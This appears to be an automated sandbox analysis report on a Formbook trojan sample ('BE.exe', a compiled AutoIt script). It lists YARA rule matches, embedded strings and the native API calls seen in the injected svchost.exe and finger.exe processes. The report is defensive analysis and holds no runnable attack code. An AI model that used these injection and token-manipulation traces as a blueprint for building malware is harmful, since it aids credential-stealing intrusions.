Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.4526747415.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4522537539.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2260683623.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4524080493.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2260393670.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4524196683.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2261145048.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4524061386.0000000004690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4526747415.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4522537539.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2260683623.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4524080493.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2260393670.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4524196683.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2261145048.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4524061386.0000000004690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: BE.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: BE.exe, 00000000.00000000.2057305972.0000000000442000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_1b300630-5
Source: BE.exe, 00000000.00000000.2057305972.0000000000442000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_441c7bd9-7
Source: BE.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_0a6285de-6
Source: BE.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_c9239366-9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040B073 NtMapViewOfSection, 2_2_0040B073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040A823 NtSetContextThread, 2_2_0040A823
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040B943 NtDelayExecution, 2_2_0040B943
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040AA33 NtResumeThread, 2_2_0040AA33
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040B2A3 NtCreateFile, 2_2_0040B2A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040A403 NtSuspendThread, 2_2_0040A403
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040B4D3 NtReadFile, 2_2_0040B4D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040BD63 NtAllocateVirtualMemory, 2_2_0040BD63
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040AE53 NtCreateSection, 2_2_0040AE53
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040A613 NtGetContextThread, 2_2_0040A613
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042BF53 NtClose, 2_2_0042BF53
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972B60 NtClose,LdrInitializeThunk, 2_2_03972B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03972DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_03972C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk, 2_2_039735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03974340 NtSetContextThread, 2_2_03974340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03974650 NtSuspendThread, 2_2_03974650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972B80 NtQueryInformationFile, 2_2_03972B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972BA0 NtEnumerateValueKey, 2_2_03972BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972BF0 NtAllocateVirtualMemory, 2_2_03972BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972BE0 NtQueryValueKey, 2_2_03972BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972AB0 NtWaitForSingleObject, 2_2_03972AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972AD0 NtReadFile, 2_2_03972AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972AF0 NtWriteFile, 2_2_03972AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972F90 NtProtectVirtualMemory, 2_2_03972F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972FB0 NtResumeThread, 2_2_03972FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972FA0 NtQuerySection, 2_2_03972FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972FE0 NtCreateFile, 2_2_03972FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972F30 NtCreateSection, 2_2_03972F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972F60 NtCreateProcessEx, 2_2_03972F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972E80 NtReadVirtualMemory, 2_2_03972E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972EA0 NtAdjustPrivilegesToken, 2_2_03972EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972EE0 NtQueueApcThread, 2_2_03972EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972E30 NtWriteVirtualMemory, 2_2_03972E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972DB0 NtEnumerateKey, 2_2_03972DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972DD0 NtDelayExecution, 2_2_03972DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972D10 NtMapViewOfSection, 2_2_03972D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972D00 NtSetInformationFile, 2_2_03972D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972D30 NtUnmapViewOfSection, 2_2_03972D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972CA0 NtQueryInformationToken, 2_2_03972CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972CC0 NtQueryVirtualMemory, 2_2_03972CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972CF0 NtOpenProcess, 2_2_03972CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972C00 NtQueryInformationProcess, 2_2_03972C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972C60 NtCreateKey, 2_2_03972C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03973090 NtSetValueKey, 2_2_03973090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03973010 NtOpenDirectoryObject, 2_2_03973010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039739B0 NtGetContextThread, 2_2_039739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03973D10 NtOpenProcessToken, 2_2_03973D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03973D70 NtOpenThread, 2_2_03973D70
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB4340 NtSetContextThread,LdrInitializeThunk, 4_2_02CB4340
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB4650 NtSuspendThread,LdrInitializeThunk, 4_2_02CB4650
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2AD0 NtReadFile,LdrInitializeThunk, 4_2_02CB2AD0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2AF0 NtWriteFile,LdrInitializeThunk, 4_2_02CB2AF0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2BE0 NtQueryValueKey,LdrInitializeThunk, 4_2_02CB2BE0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_02CB2BF0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2BA0 NtEnumerateValueKey,LdrInitializeThunk, 4_2_02CB2BA0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2B60 NtClose,LdrInitializeThunk, 4_2_02CB2B60
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2EE0 NtQueueApcThread,LdrInitializeThunk, 4_2_02CB2EE0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2E80 NtReadVirtualMemory,LdrInitializeThunk, 4_2_02CB2E80
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2FE0 NtCreateFile,LdrInitializeThunk, 4_2_02CB2FE0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2FB0 NtResumeThread,LdrInitializeThunk, 4_2_02CB2FB0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2F30 NtCreateSection,LdrInitializeThunk, 4_2_02CB2F30
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2CA0 NtQueryInformationToken,LdrInitializeThunk, 4_2_02CB2CA0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2C60 NtCreateKey,LdrInitializeThunk, 4_2_02CB2C60
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_02CB2C70
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2DD0 NtDelayExecution,LdrInitializeThunk, 4_2_02CB2DD0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_02CB2DF0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2D10 NtMapViewOfSection,LdrInitializeThunk, 4_2_02CB2D10
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2D30 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_02CB2D30
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB35C0 NtCreateMutant,LdrInitializeThunk, 4_2_02CB35C0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB39B0 NtGetContextThread,LdrInitializeThunk, 4_2_02CB39B0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2AB0 NtWaitForSingleObject, 4_2_02CB2AB0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2B80 NtQueryInformationFile, 4_2_02CB2B80
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2EA0 NtAdjustPrivilegesToken, 4_2_02CB2EA0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2E30 NtWriteVirtualMemory, 4_2_02CB2E30
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2F90 NtProtectVirtualMemory, 4_2_02CB2F90
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2FA0 NtQuerySection, 4_2_02CB2FA0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2F60 NtCreateProcessEx, 4_2_02CB2F60
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2CC0 NtQueryVirtualMemory, 4_2_02CB2CC0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2CF0 NtOpenProcess, 4_2_02CB2CF0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2C00 NtQueryInformationProcess, 4_2_02CB2C00
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2DB0 NtEnumerateKey, 4_2_02CB2DB0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB2D00 NtSetInformationFile, 4_2_02CB2D00
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB3090 NtSetValueKey, 4_2_02CB3090
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB3010 NtOpenDirectoryObject, 4_2_02CB3010
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB3D70 NtOpenThread, 4_2_02CB3D70
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB3D10 NtOpenProcessToken, 4_2_02CB3D10
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_00448880 NtCreateFile, 4_2_00448880
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_004489B0 NtReadFile, 4_2_004489B0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_00448A70 NtDeleteFile, 4_2_00448A70
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_00448AF0 NtClose, 4_2_00448AF0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_00448C20 NtAllocateVirtualMemory, 4_2_00448C20
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003ED5EB: CreateFileW,DeviceIoControl,CloseHandle, 0_2_003ED5EB
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_003E1201
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_003EE8F6
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_0038BF40 0_2_0038BF40
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_00388060 0_2_00388060
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F2046 0_2_003F2046
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003E8298 0_2_003E8298
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003BE4FF 0_2_003BE4FF
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003B676B 0_2_003B676B
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_00414873 0_2_00414873
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003ACAA0 0_2_003ACAA0
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_0038CAF0 0_2_0038CAF0
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_0039CC39 0_2_0039CC39
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003B6DD9 0_2_003B6DD9
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_0039B119 0_2_0039B119
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003891C0 0_2_003891C0
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003A1394 0_2_003A1394
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003A781B 0_2_003A781B
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_00387920 0_2_00387920
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_0039997D 0_2_0039997D
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003A7A4A 0_2_003A7A4A
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003A7CA7 0_2_003A7CA7
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_0040BE44 0_2_0040BE44
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003B9EEE 0_2_003B9EEE
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_00D73670 0_2_00D73670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403150 2_2_00403150
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004029A1 2_2_004029A1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004029B0 2_2_004029B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401270 2_2_00401270
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004112DF 2_2_004112DF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004112E3 2_2_004112E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417AB3 2_2_00417AB3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042E333 2_2_0042E333
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040257C 2_2_0040257C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00411503 2_2_00411503
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402580 2_2_00402580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040F583 2_2_0040F583
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402750 2_2_00402750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A003E6 2_2_03A003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394E3F0 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FA352 2_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C02C0 2_2_039C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A001AA 2_2_03A001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F41A2 2_2_039F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F81CC 2_2_039F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DA118 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930100 2_2_03930100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C8158 2_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D2000 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393C7C0 2_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03964750 2_2_03964750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395C6E0 2_2_0395C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A00591 2_2_03A00591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940535 2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039EE4F6 2_2_039EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E4420 2_2_039E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F2446 2_2_039F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F6BD7 2_2_039F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FAB40 2_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A0A9A6 2_2_03A0A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03956962 2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039268B8 2_2_039268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E8F0 2_2_0396E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394A840 2_2_0394A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03942840 2_2_03942840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BEFA0 2_2_039BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03932FC8 2_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394CFE0 2_2_0394CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03960F30 2_2_03960F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E2F30 2_2_039E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03982F28 2_2_03982F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B4F40 2_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03952E90 2_2_03952E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FCE93 2_2_039FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FEEDB 2_2_039FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393AE0D 2_2_0393AE0D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FEE26 2_2_039FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940E59 2_2_03940E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03958DBF 2_2_03958DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DCD1F 2_2_039DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394AD00 2_2_0394AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0CB5 2_2_039E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930CF2 2_2_03930CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940C00 2_2_03940C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0398739A 2_2_0398739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F132D 2_2_039F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392D34C 2_2_0392D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039452A0 2_2_039452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395B2C0 2_2_0395B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E12ED 2_2_039E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394B1B0 2_2_0394B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A0B16B 2_2_03A0B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392F172 2_2_0392F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0397516C 2_2_0397516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039EF0CC 2_2_039EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039470C0 2_2_039470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F70E9 2_2_039F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FF0E0 2_2_039FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FF7B0 2_2_039FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F16CC 2_2_039F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03985630 2_2_03985630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DD5B0 2_2_039DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A095C3 2_2_03A095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F7571 2_2_039F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FF43F 2_2_039FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03931460 2_2_03931460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395FB80 2_2_0395FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B5BF0 2_2_039B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0397DBF9 2_2_0397DBF9
